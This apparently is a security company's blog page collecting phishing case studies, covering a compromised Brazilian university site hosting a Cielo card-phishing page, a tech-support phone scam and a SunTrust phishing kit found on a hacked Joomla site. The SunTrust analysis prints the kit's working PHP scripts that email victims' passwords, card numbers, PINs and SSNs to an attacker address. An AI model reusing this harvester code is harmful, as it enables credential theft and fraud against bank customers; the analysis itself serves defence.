UNICAMP – Used to Host Phishing Pages

March 25, 2013 by 1 Comment

We just discovered that UNICAMP (Universidade Estadual de Campinas), a renowned Brazilian University, has had their infrastructure compromised and it is being used to host phishing link which are then being used email spear phishing campaigns.

In this specific campaign they appear to be targeting a visitors credit card information. We came across the issue while working on an infected site. The attacker had modified the site’s .htaccess to redirect incoming traffic to the Phishing files:

hxxp://www.cpa.unicamp.br/alcscens/as/public.php (The URL was slightly modified to avoid accidental clicks)

This link was leading to the following URL which is still live. The content looks to have been cleared up:

hxxp://www0.comprapremiadacielo.web-maker.kz/

This was a phishing page pretending to be from Cielo, one of the biggest electronic payments operators in Brazil. It was pretending to offer promotions and discounts that requested the visitors credit card information.

Here’s an image of the phishing page:

cielo-phishing

We also found a file containing an email message and script to send emails to potential victims. Here’s the content of the email file:

httx://www. cpa.unicamp.br/alcscens/as/public.phpios%20autenticado&pbx=1&oq=&aq=&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2%2cor.r_gc.r_pw.%2ccf.osb&fp=aa151a29d476e27c&pf=p&pdl=500
Caso não esteja vendo as imagens desse e-mail, click aqui: http://www.cpa.unicamp.br/alcscens/as/public.php

While there does not appear to be any evidence of other nefarious activities on the site, it is still best practice to avoid the site until the University has an opportunity to clean themselves up.

Written by Magno Logan and Fio.

Filed Under: phishing Tagged With:

Google Safe Browsing Program 5 Years Old – Been Blacklisted Lately?

June 19, 2012 by 5 Comments

Today Google released a nice post: Safe Browsing – Protecting Web Users for 5 Years and Counting. In it they provide a good summary of what they have been up to the past 5 years with their Safe Browsing program.

Here are some interesting data points:

  • 600 million users are protected
  • 9,500 new malicious websites are found every day
  • 12 – 14 million Google Search queries show malicious warnings
  • Provide warnings to about 300,000 downloads per day
  • Send thousands of notifications daily to webmasters
  • Sent thousands of notifications daily to Internet Service Providers (ISPs)


Read More

Filed Under: awareness, blacklisted, community, data, education, Malware, malware_updates, phishing, research, security, stats, sucuri Tagged With: , , , , , , , ,

Phishing phone calls – Onlinesupport.com

June 28, 2011 by 4 Comments

It was early morning (around 8am) and I received a phone call from someone asking for me by name (using a private number and with a strong Indian accent):

Caller: Hello, Can I speak with XX?” (my real name)

Me: Sure, it is me.

Caller: Hello, I am calling from Online Support because there are some serious warnings coming from our Windows Server saying that your computer is compromised.

Me: Wow, it is?

At this point I was aware of what wass going on. This group from India has been calling thousands of numbers scaring people that their computer is compromised and convincing them to buy their service or install their software.

Read More

Filed Under: phishing, phone, security Tagged With: , ,

Chase phishing – case study

March 8, 2011 by 1 Comment

Last week we were called to fix a Joomla site that was infected by malware and disabled by their hosting company. The user forwarded the email he received:

Your account was reported to us by Google for malicious content and has been deactivated.

We ran a search on your account for the content that was reported and found files that contained malicious code. We created a text file that lists the files that we found the malicious code in and put it in your home directory; The file is called malware.txt. This file is not actually infected, it is an actual list of the problem files on your account based on Google’s report. Please keep in mind that we cannot guarantee that this is a complete list of every possible issue that your account has, it is a list of what we found based on Google’s report.

Nothing really unusual as we see this many times a day.

However, after some analysis of the site, we found a directory that didn’t look quite right. It was called “chase” and was inside another hidden directory called “.webservices”…

When we looked at the content, it had 3 files:

Read More

Filed Under: hacked, joomla, phishing Tagged With: , ,

SunTrust phishing – case study

April 28, 2010 by Leave a Comment

Last week we were called to fix a Joomla site that got blacklisted and had some malware on it. Nothing unusual as we do that many times a day. However, after some analysis of the site, we found a directory that didn’t look quite right.

That’s what we found: /public_html/components/com_jsecure/SunTrust. Hum… a “SunTrust directory? That shouldn’t be there.

When we looked at the content, it had 4 files:

$ ls -la 
index2.htm
index.htm
login.php
server.php

The index.htm was similar to the login page from SunTrust and asked for the user/pass of the person accessing it:


When the user submitted the form, it would load the login.php script:

$ip = getenv("REMOTE_ADDR");
$message .= "------------------------------------------------------------------\n";
$message .= "USER ID : ".$_POST['uid']."\n";
$message .= "Password : ".$_POST['password']."\n";
$message .= "IP: ".$ip."\n";
$message .= "---------------Powered By SLim------------------------------\n";

$recipient = "peculiarhome@sify.com";
$subject = "SunTrust-Bank";
$headers = "From: ";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
  if (mail($recipient,$subject,$message,$headers))
    {
     header("Location: index2.htm");

    }
else
        {
   echo "ERROR! Please go back and try again.";
      }

This script would send to peculiarhome@sify.com the user name and password of the victim. But that’s not it, after that, it will load the index2.htm that will ask the user for every information possible:

Once the form is completed, the server.php script would be loaded and send all that information to peculiarhome@sify.com:

$ip = getenv("REMOTE_ADDR");
$message .= "------------------------------------------------------------------\n";
$message .= "Name On Account: ".$_POST['ucxATMCredentials:txtNAME']."\n";
$message .= "Social Security Number/TAX ID: ".$_POST['ucxATMCredentials:txtSSN']."\n";
$message .= "Account Number: ".$_POST['ucxATMCredentials:txtLast4DigitsOfAcct']."\n";
$message .= "Card Number: ".$_POST['ucxATMCredentials:txtATMPAN']."\n";
$message .= "Pin Number: ".$_POST['ucxATMCredentials:txtATMPin']."\n";
$message .= "Cvv2: ".$_POST['ucxATMCredentials:txtATMCvv2']."\n";
$message .= "Expiry Date: ".$_POST['ucxATMCredentials:txtExp']."\n";
$message .= "Mother's Maiden Name: ".$_POST['ucxATMCredentials:txtMMN']."\n";
$message .= "Date of Birth: ".$_POST['ucxATMCredentials:txtDOB']."\n";
$message .= "Email Address: ".$_POST['ucxATMCredentials:txtEmail']."\n";
$message .= "Email Password: ".$_POST['ucxATMCredentials:txtPass']."\n";
$message .= "IP: ".$ip."\n";
$message .= "---------------Powered By SLim------------------------------\n";

$recipient = "peculiarhome@sify.com";
$subject = "SunTrust-Bank info";
$headers = "From: ";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
  if (mail($recipient,$subject,$message,$headers))
    {
     header("Location: https://www.suntrust.com/");

    }
else
        {
   echo "ERROR! Please go back and try again.";
      }

Very nasty. We looked at all the logs and since this directory was recent, we believe no one got harmed through it.

Solving phishing
For the banks out there, I recommend that you check your logs and look for all the referees of the images being loaded. In this example we analyzed, the images and the css files were being loaded directory from the suntrust site, so if they were analyzing their logs they would have detected it.

For the web masters and site owners out there: Keep your sites updated, use good passwords and monitor your sites!

As always, if you need help to recover from web attacks or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

Filed Under: Uncategorized Tagged With: , ,